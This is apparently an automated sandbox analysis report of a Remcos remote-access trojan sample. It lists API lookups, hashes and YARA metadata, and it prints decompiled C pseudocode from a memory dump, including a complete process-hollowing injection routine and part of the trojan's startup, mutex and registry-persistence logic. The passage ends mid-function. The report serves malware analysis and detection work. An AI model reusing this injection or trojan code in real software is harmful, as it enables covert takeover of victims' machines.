                                          • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040CD54
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CD57
                                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040CD71
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CD74
                                          • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040CD85
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CD88
                                          • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040CD99
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CD9C
                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040CDAD
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CDB0
                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040CDC1
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CDC4
                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040CDD5
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CDD8
                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040CDE9
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CDEC
                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040CDFD
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CE00
                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040CE11
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CE14
                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040CE25
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CE28
                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040CE36
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CE39
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$HandleModule$LibraryLoad
                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Octopus-GM39UT$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                                          • API String ID: 551388010-1666371535
                                          • Opcode ID: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
                                          • Instruction ID: 7f0a72ef543637f7c74f83f283374f20c8e911501c3ee670a040c0af445c8e1c
                                          • Opcode Fuzzy Hash: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
                                          • Instruction Fuzzy Hash: 1F21AEA0E8135875D620BBB29C49E1B2E58DA44B95B204927F205D7191FFFCC540CEEF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041412B, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 184COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E0041412B(WCHAR* __ecx, char __edx, struct _PROCESS_INFORMATION* _a4) {
				void _v8;
				signed int _v12;
				char _v16;
				CONTEXT* _v20;
				WCHAR* _v24;
				struct _STARTUPINFOW _v92;
				void* __edi;
				int _t57;
				void* _t58;
				CONTEXT* _t62;
				int _t63;
				int _t71;
				void* _t72;
				void* _t73;
				int _t74;
				int _t79;
				long _t80;
				int _t83;
				intOrPtr* _t95;
				void* _t98;
				signed int _t102;
				intOrPtr _t104;
				void* _t106;
				CONTEXT* _t110;
				void* _t113;
				CONTEXT* _t114;
				struct _PROCESS_INFORMATION* _t116;

				_v8 = _v8 & 0x00000000;
				_v16 = __edx;
				_v24 = __ecx;
				if( *((intOrPtr*)(__edx)) == 0x5a4d) {
					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
					if( *_t95 == 0x4550) {
						_push(_t106);
						L00431F00(_t106,  &_v92, 0, 0x44);
						_t116 = _a4;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t57 = CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116); // executed
						if(_t57 == 0) {
							L21:
							_t58 = 0;
							L22:
							L23:
							return _t58;
						}
						FindCloseChangeNotification(_v92.hStdInput); // executed
						FindCloseChangeNotification(_v92.hStdOutput); // executed
						CloseHandle(_v92.hStdError);
						_t62 = VirtualAlloc(0, 4, 0x1000, 4); // executed
						_t110 = _t62;
						_v20 = _t110;
						_t110->ContextFlags = 0x10007;
						_t63 = GetThreadContext(_t116->hThread, _t110); // executed
						if(_t63 == 0) {
							L20:
							TerminateProcess(_t116->hProcess, 0); // executed
							CloseHandle(_t116->hProcess);
							CloseHandle(_t116->hThread);
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							goto L21;
						}
						_t71 = ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0); // executed
						if(_t71 == 0) {
							goto L20;
						}
						_t72 = _v8;
						if(_t72 ==  *(_t95 + 0x34)) {
							NtUnmapViewOfSection(_t116->hProcess, _t72);
						}
						_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40); // executed
						_v24 = _t73;
						if(_t73 == 0) {
							goto L20;
						} else {
							_t22 =  &_v16; // 0x41433b
							_t113 =  *_t22;
							_t74 = WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0); // executed
							if(_t74 == 0) {
								goto L20;
							}
							_v12 = _v12 & 0x00000000;
							if(0 >=  *(_t95 + 6)) {
								L14:
								_t98 = _t95 + 0x34;
								_t114 = _v20;
								if(_v8 ==  *_t98) {
									L17:
									_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
									_t79 = SetThreadContext(_t116->hThread, _t114); // executed
									if(_t79 == 0) {
										goto L20;
									}
									_t80 = ResumeThread(_t116->hThread); // executed
									if(_t80 == 0xffffffff) {
										goto L20;
									}
									_t58 = 1;
									goto L22;
								}
								_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0); // executed
								if(_t83 != 0) {
									goto L17;
								}
								TerminateProcess(_t116->hProcess, _t83);
								goto L21;
							}
							_t104 = 0;
							_v16 = 0;
							do {
								WriteProcessMemory( *_t116,  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x10c)) + _t113,  *( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x108), 0); // executed
								_t37 =  &_v16; // 0x41433b
								_t102 = _v12 + 1;
								_t104 =  *_t37 + 0x28;
								_v12 = _t102;
								_v16 = _t104;
							} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
							goto L14;
						}
					}
					_t58 = 0;
					goto L23;
				}
				return 0;
			}






























                                          0x00414131
                                          0x0041413a
                                          0x0041413d
                                          0x00414143
                                          0x00414150
                                          0x00414158
                                          0x00414162
                                          0x0041416b
                                          0x00414170
                                          0x0041417a
                                          0x0041417c
                                          0x0041417d
                                          0x0041417e
                                          0x00414190
                                          0x00414198
                                          0x00414322
                                          0x00414322
                                          0x00414324
                                          0x00414326
                                          0x00000000
                                          0x00414326
                                          0x004141a7
                                          0x004141ac
                                          0x004141b1
                                          0x004141be
                                          0x004141c4
                                          0x004141c7
                                          0x004141ca
                                          0x004141d3
                                          0x004141db
                                          0x00414301
                                          0x00414305
                                          0x00414313
                                          0x00414318
                                          0x0041431e
                                          0x0041431f
                                          0x00414320
                                          0x00414321
                                          0x00000000
                                          0x00414321
                                          0x004141f5
                                          0x004141fd
                                          0x00000000
                                          0x00000000
                                          0x00414203
                                          0x00414209
                                          0x0041420e
                                          0x0041420e
                                          0x00414223
                                          0x00414229
                                          0x0041422e
                                          0x00000000
                                          0x00414234
                                          0x00414234
                                          0x00414234
                                          0x00414240
                                          0x00414248
                                          0x00000000
                                          0x00000000
                                          0x0041424e
                                          0x00414258
                                          0x004142a2
                                          0x004142a5
                                          0x004142a8
                                          0x004142ad
                                          0x004142d5
                                          0x004142dc
                                          0x004142e5
                                          0x004142ed
                                          0x00000000
                                          0x00000000
                                          0x004142f2
                                          0x004142fb
                                          0x00000000
                                          0x00000000
                                          0x004142fd
                                          0x00000000
                                          0x004142fd
                                          0x004142c0
                                          0x004142c8
                                          0x00000000
                                          0x00000000
                                          0x004142cd
                                          0x00000000
                                          0x004142cd
                                          0x0041425a
                                          0x0041425c
                                          0x0041425f
                                          0x00414284
                                          0x0041428d
                                          0x00414290
                                          0x00414295
                                          0x00414298
                                          0x0041429b
                                          0x0041429e
                                          0x00000000
                                          0x0041425f
                                          0x0041422e
                                          0x0041415a
                                          0x00000000
                                          0x0041415a
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: ;CA
                                          • API String ID: 0-233881251
                                          • Opcode ID: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
                                          • Instruction ID: bd197fad053dbfc90d5835daa1a59b9970fe7a36a364e2f4af16486f2ac585b0
                                          • Opcode Fuzzy Hash: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
                                          • Instruction Fuzzy Hash: 09518D70600604BFEB108FA5CC45FAABBB9FF84742F144065FA54E62A1C775D990DB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404E9A, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 96timethreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocalTime.KERNEL32(00000001,0046C238,0046C780,00000000,?,?,?,?,?,?,?,?,?,?,?,004125B1), ref: 00404ED2
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C238,0046C780,00000000), ref: 00404F85
                                          • CreateThread.KERNELBASE(00000000,00000000,0040518A,?,00000000,00000000), ref: 00404F98
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Create$EventLocalThreadTime
                                          • String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i
                                          • API String ID: 2532271599-119634454
                                          • Opcode ID: dc77e667257af7b5de05517ff536dae1ad9cd995fdb6c6a3c9126bbe164289b7
                                          • Instruction ID: 5fa9d90cb8be4f3930b06c8b0122489401ffe22f77aad5cdb7e0e5ab13402fbc
                                          • Opcode Fuzzy Hash: dc77e667257af7b5de05517ff536dae1ad9cd995fdb6c6a3c9126bbe164289b7
                                          • Instruction Fuzzy Hash: 833194A1800255BACB10FBA6CC09DBFBBBCAF95709F04046FF941A21D2EA7C9945D764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D0B5, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00410885: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
                                            • Part of subcall function 00410885: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
                                            • Part of subcall function 00410885: RegCloseKey.KERNELBASE(?), ref: 004108CE
                                          • Sleep.KERNELBASE(00000BB8), ref: 0040D169
                                          • ExitProcess.KERNEL32 ref: 0040D1DE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                          • String ID: 3.2.1 Pro$override$pth_unenc
                                          • API String ID: 2281282204-2083519672
                                          • Opcode ID: 05ea415e688babb82103080c69336f853dd6c1ec8a960b799ff37d6a8991d508
                                          • Instruction ID: 08f4d26337d929cf8c522b5db6824f2b5f74010f43e1cc258f687c08e2209bf0
                                          • Opcode Fuzzy Hash: 05ea415e688babb82103080c69336f853dd6c1ec8a960b799ff37d6a8991d508
                                          • Instruction Fuzzy Hash: 45212731F443012BD608B6B68C57B6F32969B80708F10042FB8066B2D2FEBDDA45879F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0042E5CA, Relevance: 4.5, APIs: 3, Instructions: 33encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000001,?,0042E381,00000024,?,00000000,?), ref: 0042E5DF
                                          • CryptGenRandom.ADVAPI32(00000000,00000000,?,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3), ref: 0042E5F4
                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3,?), ref: 0042E606
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Crypt$Context$AcquireRandomRelease
                                          • String ID:
                                          • API String ID: 1815803762-0
                                          • Opcode ID: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
                                          • Instruction ID: 38117f8ee5779777ede6d5b7ba3ea51b7ecd80fb833ca9539c352c605c5c0cae
                                          • Opcode Fuzzy Hash: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
                                          • Instruction Fuzzy Hash: 46F06D31318324BBEB310F56FC19F573E99EB81BA6FA00536F209E50E4E6628940865C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00416D9E, Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetComputerNameExW.KERNEL32(00000001,?,00000028,0046C578), ref: 00416DBB
                                          • GetUserNameW.ADVAPI32(?,00000037), ref: 00416DD3
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Name$ComputerUser
                                          • String ID:
                                          • API String ID: 4229901323-0
                                          • Opcode ID: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
                                          • Instruction ID: 97ef4402937901d3963fe518a4296ad78cd3b90a883e9fb2300271c61e114a9f
                                          • Opcode Fuzzy Hash: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
                                          • Instruction Fuzzy Hash: 38014F7190011CABCB00EB90DC45EDDB7BCEF44305F10016AF905B2196EEB46A898B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00422251, Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: recv
                                          • String ID:
                                          • API String ID: 1507349165-0
                                          • Opcode ID: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
                                          • Instruction ID: e48ef5bedcc115dfdcbe715373a672fa69d6f329cf61ba9e4e3f48fb4f6a798c
                                          • Opcode Fuzzy Hash: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
                                          • Instruction Fuzzy Hash: 9DC02B3900420CBFCF011FA0CD0CCBD3FADD7443517008024F90102251C533C62097A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0042F8B9, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_0002F8C5,0042F5A8), ref: 0042F8BE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
                                          • Instruction ID: 86e206407557d0ac1bda88e2f45e42cbf33a4e9732861bd4a6740e282559d687
                                          • Opcode Fuzzy Hash: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041AAA0, Relevance: .6, Instructions: 585COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3b70316521038a8c364eb9b4d2c8532403025d820ed2247955e782ac66748b0c
                                          • Instruction ID: 49bedcb936ec6ce3924db17fa1c14752e1e0bec2c1eaa22c03ee826eb31dc35c
                                          • Opcode Fuzzy Hash: 3b70316521038a8c364eb9b4d2c8532403025d820ed2247955e782ac66748b0c
                                          • Instruction Fuzzy Hash: F022F371A012199BDF15CF68C8907EEB7B1EF44314F18416BEC55AB382DB389E81CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C2BE, Relevance: 63.8, APIs: 16, Strings: 20, Instructions: 774synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E0040C2BE(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v744;
				char _v756;
				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				signed int _v780;
				char _v784;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t71;
				void* _t78;
				void** _t86;
				void* _t87;
				void* _t90;
				CHAR* _t93;
				long _t95;
				int _t97;
				char _t100;
				void* _t101;
				void* _t105;
				void* _t121;
				void* _t122;
				void* _t129;
				char _t135;
				char* _t137;
				signed char* _t139;
				signed char* _t141;
				void* _t144;
				void* _t146;
				void* _t160;
				void* _t163;
				intOrPtr _t165;
				void* _t166;
				intOrPtr _t182;
				intOrPtr* _t185;
				void* _t187;
				void* _t193;
				char* _t196;
				void* _t199;
				char* _t203;
				void* _t210;
				signed short* _t214;
				void* _t215;
				void* _t216;
				signed int _t217;
				CHAR* _t224;
				void* _t226;
				char* _t229;
				char* _t231;
				intOrPtr* _t233;
				void* _t235;
				intOrPtr* _t240;
				intOrPtr* _t244;
				void* _t246;
				void* _t254;
				void* _t265;
				void* _t268;
				struct _SECURITY_ATTRIBUTES* _t269;
				int _t272;
				char* _t360;
				signed int _t382;
				signed int _t386;
				int _t388;
				signed int _t394;
				signed int _t397;
				intOrPtr _t423;
				void* _t433;
				void* _t435;
				signed int _t452;
				void* _t455;
				char* _t461;
				void* _t462;
				char* _t465;
				void* _t467;
				void* _t472;
				char* _t477;
				intOrPtr* _t481;
				void* _t484;
				void* _t485;
				void* _t486;
				signed int _t492;
				void* _t495;
				void* _t496;
				void* _t497;
				void* _t499;
				void* _t501;
				void* _t502;
				void* _t506;

				_t444 = __edx;
				 *0x46bd28 = _a4;
				_push(_t268);
				L0040CC55( &_v724, __edx, __eflags);
				_t495 = (_t492 & 0xfffffff8) - 0x2f4;
				E004020EC(_t268, _t495, __edx, __eflags, 0x46c59c);
				_t496 = _t495 - 0x18;
				E004020EC(_t268, _t496, __edx, __eflags,  &_v728);
				_t71 = E00417478( &_v756, __edx); // executed
				_t497 = _t496 + 0x30;
				E0040D458(__edx, _t71);
				L00401E74( &_v760, __edx);
				_t284 = _a12;
				if( *_a12 != 0x2d) {
					L6:
					_t461 = 0x46c578;
					__eflags =  *((char*)(L00401F95(L00401E49(0x46c578, _t444, __eflags, 3))));
					 *0x46bb01 = __eflags != 0;
					_t78 = E00405343(_t268,  &_v756, E004075E6( &_v780, "Software\\", __eflags, L00401E49(0x46c578, _t444, __eflags, 0xe)), 0x46c578, __eflags, "\\");
					_t471 = 0x46c518;
					E00401FD1(0x46c518, _t77, 0x46c518, _t78);
					E00401FC7();
					E00401FC7();
					L00405A0B(_t268, 0x46c5cc, "Exe");
					_t269 = 0;
					L00401E49(0x46c578, _t77, __eflags, 0x32);
					__eflags =  *(E00405220(0));
					 *0x46bd4e = __eflags != 0;
					L00401E49(0x46c578, _t77, __eflags, 0x33);
					_t86 = E00405220(0);
					__eflags =  *_t86;
					 *0x46bd4f =  *_t86 != 0;
					__eflags =  *0x46bd4e - _t269; // 0x0
					if(__eflags == 0) {
						L8:
						_v776 = _t269;
						_t87 = OpenMutexA(0x100000, _t269, "Remcos_Mutex_Inj"); // executed
						_t472 = _t87;
						__eflags = _t472;
						if(_t472 != 0) {
							WaitForSingleObject(_t472, 0xea60);
							CloseHandle(_t472);
						}
						_t447 = L00401F95(0x46c518); // executed
						_t90 = E00410885(_t89, "Inj",  &_v776); // executed
						__eflags = _t90;
						if(__eflags != 0) {
							_t447 = L00401F95(0x46c518);
							L00410CE2(_t259, __eflags, "Inj");
						}
						L00401FAD(0x46c548, L00401E49(_t461, _t447, __eflags, 0xe));
						_t93 = L00401F95(0x46c548);
						_t462 = 0;
						_t272 = 1;
						CreateMutexA(0, 1, _t93); // executed
						_t95 = GetLastError();
						__eflags = _t95 - 0xb7;
						if(_t95 == 0xb7) {
							L45:
							E00401FC7();
							_t97 = _t272;
							goto L5;
						} else {
							E0040CD09();
							GetModuleFileNameW(0, "C:\Windows\SysWOW64\logagent.exe", 0x104);
							_t100 = E00417614(0x46c548);
							_push(0x46c548);
							_t448 = 0x80000002;
							 *0x46beb4 = _t100;
							_t101 = E004108E2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
							_t499 = _t497 + 0xc;
							E00401FD1(0x46c5b4, 0x80000002, 0x46c5b4, _t101);
							E00401FC7();
							__eflags =  *0x46beb4;
							if( *0x46beb4 == 0) {
								_push(" (32 bit)");
							} else {
								_push(" (64 bit)");
							}
							L00405A02(_t272, 0x46c5b4, _t462);
							_t105 =  *0x46bd20;
							__eflags = _t105;
							if(_t105 != 0) {
								 *0x46a9d0 =  *_t105();
							}
							_t477 = 0x46c578;
							__eflags = _v776 - _t462;
							if(__eflags == 0) {
								_t433 = L00401E49(0x46c578, _t448, __eflags, 0x2e);
								__eflags =  *((char*)(L00401F95(_t433)));
								if(__eflags != 0) {
									__eflags =  *0x46bd20 - _t462; // 0x7536e630
									if(__eflags != 0) {
										__eflags =  *0x46a9d0 - _t462; // 0x1
										if(__eflags == 0) {
											_t448 = L00401F95(0x46c518);
											_t254 = E0041083B(0x46c518, _t253, "origmsc");
											_pop(_t435);
											__eflags = _t254;
											if(__eflags == 0) {
												L00405F77(_t272, _t435, _t448);
											}
										} else {
											_push(_t433);
											_push(_t433);
											__eflags = E0040A713() - 0xffffffff;
											if(__eflags == 0) {
												E00406071(__eflags);
											}
										}
									}
								}
							}
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 0x27))));
							if(__eflags != 0) {
								E0040D3F7();
							}
							L00409DC9(_t272, 0x46c4e8, L00401F95(L00401E49(_t477, _t448, __eflags, 0xb)));
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 4))));
							 *0x46bb02 = __eflags != 0;
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 5))));
							 *0x46bafb = __eflags != 0;
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 8))));
							 *0x46bb00 = __eflags != 0;
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 3))));
							if(__eflags != 0) {
								_t240 = L00401F95(L00401E49(_t477, _t448, __eflags, 0x30));
								_t25 = _t240 + 2; // 0x2
								_t448 = _t25;
								do {
									_t423 =  *_t240;
									_t240 = _t240 + 2;
									__eflags = _t423 - _t462;
								} while (_t423 != _t462);
								__eflags = _t240 - _t448;
								if(__eflags != 0) {
									_t244 = L00401F95(L00401E49(_t477, _t448, __eflags, 9));
									_t246 = L00401F95(L00401E49(0x46c578, _t448, __eflags, 0x30));
									_t448 =  *_t244;
									L00401EFA(0x46c530,  *_t244, _t244, E0041805B( &_v780,  *_t244, _t246));
									L00401EF0();
									_t477 = 0x46c578;
								}
							}
							__eflags = _v776 - _t462;
							if(_v776 != _t462) {
								L00431F00(_t462,  &_v524, _t462, 0x208);
								_t121 = E00402489();
								_t122 = L00401F95(0x46c560);
								_t449 = L00401F95(0x46c518);
								E00410A30(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
								_t501 = _t499 + 0x20;
								L00409DC9(_t272, 0x46c500,  &_v524);
								_t465 = 0x46c578;
								goto L47;
							} else {
								__eflags =  *0x46bb01;
								if(__eflags == 0) {
									L00409DC9(_t272, 0x46c500, "C:\Windows\SysWOW64\logagent.exe");
								} else {
									_t229 = L00401F95(L00401E49(_t477, _t448, __eflags, 0x1e));
									_t231 = L00401F95(L00401E49(_t477, _t448, __eflags, 0xc));
									_t233 = L00401F95(L00401E49(0x46c578, _t448, __eflags, 9));
									__eflags =  *_t229;
									__eflags =  *_t231;
									_t477 = 0x46c578;
									_t235 = L00401F95(L00401E49(0x46c578, _t448,  *_t231, 0xa));
									L0040A987( *_t233, L00401F95(L00401E49(0x46c578, _t448, __eflags, 0x30)), _t235, ((_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0x000000ff);
									_t499 = _t499 + 0xc;
									_t272 = 1;
									_t462 = 0;
								}
								_t210 = E00402489();
								_t452 = 2;
								_t394 =  ~(0 | __eflags > 0x00000000) | (_t210 + 0x00000001) * _t452;
								_push(_t394);
								_v780 = _t394;
								_t486 = E0042F4C6(_t394, (_t210 + 1) * _t452 >> 0x20, _t477, __eflags);
								__eflags = _t486;
								if(_t486 == 0) {
									_t486 = _t462;
								} else {
									L00431F00(_t462, _t486, _t462, _v780);
									_t499 = _t499 + 0xc;
								}
								_t214 = L00401EEB(0x46c500);
								_t455 = _t486 - _t214;
								__eflags = _t455;
								_t467 = 2;
								do {
									_t397 =  *_t214 & 0x0000ffff;
									 *(_t214 + _t455) = _t397;
									_t214 = _t214 + _t467;
									__eflags = _t397;
								} while (_t397 != 0);
								_push(_t397);
								_t215 = E00402489();
								_t216 = L00401F95(0x46c560);
								_t217 = E00402489();
								E00410C80(L00401F95(0x46c518), __eflags, "exepath", _t486, 2 + _t217 * 2, _t216, _t215); // executed
								E0042F4CF(_t486);
								_t501 = _t499 + 0x1c;
								_t465 = 0x46c578;
								L00401E49(0x46c578, _t219, __eflags, 0xd);
								_t449 = "0";
								__eflags = L0040EAD9(__eflags);
								if(__eflags == 0) {
									L47:
									_push(_t272);
									_t129 = L00401F95(L00401E49(_t465, _t449, __eflags, 0x34));
									_t502 = _t501 - 0x18;
									E00402084(_t272, _t502, _t129);
									_push("licence");
									_t450 = L00401F95(0x46c518); // executed
									E00410AA7(0x46c518, _t131); // executed
									_t497 = _t502 + 0x20;
									_t135 = E00436769(_t133, L00401F95(L00401E49(_t465, _t131, __eflags, 0x28)));
									 *0x46bb03 = _t135;
									__eflags = _t135 - 2;
									if(_t135 != 2) {
										__eflags = _t135 - _t272;
										if(__eflags == 0) {
											_t388 = 0;
											__eflags = 0;
											goto L51;
										}
									} else {
										_t388 = _t272;
										L51:
										L00418F59(_t272, _t388, _t450);
										__eflags = 0;
										CreateThread(0, 0,  &M00418D28, 0, 0, 0);
									}
									_t137 = L00401F95(L00401E49(_t465, _t450, __eflags, 0x37));
									_t139 = L00401F95(L00401E49(_t465, _t450, __eflags, 0x10));
									_t141 = L00401F95(L00401E49(_t465, _t450, __eflags, 0xf));
									__eflags =  *_t137;
									_t471 = 0x46c578;
									_t144 = E00436769(_t142, L00401F95(L00401E49(0x46c578, _t450,  *_t137, 0x36)));
									_t146 = L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x11));
